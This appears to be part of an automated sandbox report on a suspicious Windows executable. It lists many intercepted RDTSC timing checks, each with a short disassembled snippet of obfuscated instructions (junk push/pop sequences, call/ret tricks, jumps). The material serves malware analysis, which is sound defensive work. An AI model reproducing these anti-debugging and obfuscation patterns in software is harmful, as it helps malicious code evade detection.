Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172B64D second address: 172B657 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEA75194B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172A79F second address: 172A7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172A7A3 second address: 172A7A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C5D3 second address: 172C5DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C5DC second address: 172C5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D694 second address: 172D699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D699 second address: 172D6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B54h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D6BA second address: 172D6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D6C1 second address: 172D715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FEA75194B48h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D29EAh] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D1825h], ebx 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D1A88h] 0x0000003a xchg eax, esi 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172D715 second address: 172D719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172E737 second address: 172E747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172F7DA second address: 172F7EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F6Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17307C4 second address: 17307C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17307C8 second address: 17307CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C862 second address: 172C875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEA75194B46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FEA75194B46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C875 second address: 172C88D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b ja 00007FEA75199F66h 0x00000011 jp 00007FEA75199F66h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172C88D second address: 172C8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B4Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172F901 second address: 172F90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173299B second address: 1732A1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FEA75194B48h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D29D1h] 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e mov dx, ax 0x00000031 xor edi, dword ptr [ebp+122D37C9h] 0x00000037 popad 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FEA75194B48h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 js 00007FEA75194B4Ch 0x0000005a mov dword ptr [ebp+122D2B9Bh], eax 0x00000060 sub bx, AF84h 0x00000065 xchg eax, esi 0x00000066 push edi 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a pop eax 0x0000006b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1732A1F second address: 1732A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1732B83 second address: 1732C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 cld 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FEA75194B48h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a sub di, 6906h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov bx, 7FE9h 0x0000003a mov eax, dword ptr [ebp+122D0365h] 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007FEA75194B48h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a sub edi, dword ptr [ebp+12447520h] 0x00000060 mov ebx, dword ptr [ebp+122D37D9h] 0x00000066 mov bx, cx 0x00000069 push FFFFFFFFh 0x0000006b jbe 00007FEA75194B4Ch 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 push edi 0x00000075 pushad 0x00000076 popad 0x00000077 pop edi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17352F8 second address: 1735308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1736565 second address: 173656A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173656A second address: 1736570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D7ED second address: 173D830 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FEA75194B4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEA75194B53h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FEA75194B58h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D830 second address: 173D849 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA75199F66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FEA75199F6Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D849 second address: 173D857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jg 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D857 second address: 173D869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D869 second address: 173D86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173CECF second address: 173CEE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FEA75199F66h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D076 second address: 173D0A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B56h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEA75194B53h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D0A3 second address: 173D0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D0A7 second address: 173D0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 173D235 second address: 173D23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17422C9 second address: 17422CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1742328 second address: 174236D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEA75199F73h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 jg 00007FEA75199F68h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop eax 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007FEA75199F66h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1747969 second address: 1747973 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1747501 second address: 1747523 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007FEA75199F6Ah 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CE13 second address: 174CE1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CE1B second address: 174CE2F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA75199F66h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CE2F second address: 174CE49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CE49 second address: 174CE6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F76h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D389 second address: 174D38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D4C6 second address: 174D4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D4CF second address: 174D4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D4D5 second address: 174D4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D4D9 second address: 174D4F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEA75194B55h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D8DC second address: 174D8F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD43 second address: 174DD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jmp 00007FEA75194B4Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD58 second address: 174DD6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD6C second address: 174DD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD70 second address: 174DD74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD74 second address: 174DD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FEA75194B4Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD91 second address: 174DD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174E1A7 second address: 174E1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B4Fh 0x00000009 popad 0x0000000a jo 00007FEA75194B4Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174E1C3 second address: 174E1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007FEA75199F72h 0x0000000c jmp 00007FEA75199F79h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174E1FB second address: 174E210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B4Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CA7E second address: 174CA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CA82 second address: 174CA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1752E70 second address: 1752EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FEA75199F77h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 jmp 00007FEA75199F6Ch 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop ebx 0x0000001d jmp 00007FEA75199F6Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175333C second address: 1753354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 jmp 00007FEA75194B4Ch 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1753354 second address: 175335A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175335A second address: 175337F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175337F second address: 1753383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1753639 second address: 175363D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175363D second address: 1753641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1753641 second address: 1753660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B59h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1753C13 second address: 1753C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007FEA75199F66h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FEA75199F71h 0x00000016 jnp 00007FEA75199F66h 0x0000001c jne 00007FEA75199F66h 0x00000022 popad 0x00000023 pop edx 0x00000024 pop eax 0x00000025 jl 00007FEA75199F8Bh 0x0000002b jmp 00007FEA75199F73h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FEA75199F6Ah 0x00000037 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1756C8E second address: 1756C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1756C92 second address: 1756CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FEA75199F7Fh 0x0000000f jmp 00007FEA75199F79h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1756CBE second address: 1756CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1756CC2 second address: 1756CC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16D2334 second address: 16D236C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA75194B5Eh 0x00000008 jmp 00007FEA75194B58h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75194B56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16D236C second address: 16D238D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA75199F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FEA75199F71h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16D238D second address: 16D2395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA0D second address: 16DAA19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FEA75199F66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA19 second address: 16DAA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA1D second address: 16DAA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA21 second address: 16DAA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FEA75194B50h 0x00000011 jmp 00007FEA75194B55h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA54 second address: 16DAA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A23B second address: 175A254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B54h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721155 second address: 1721159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
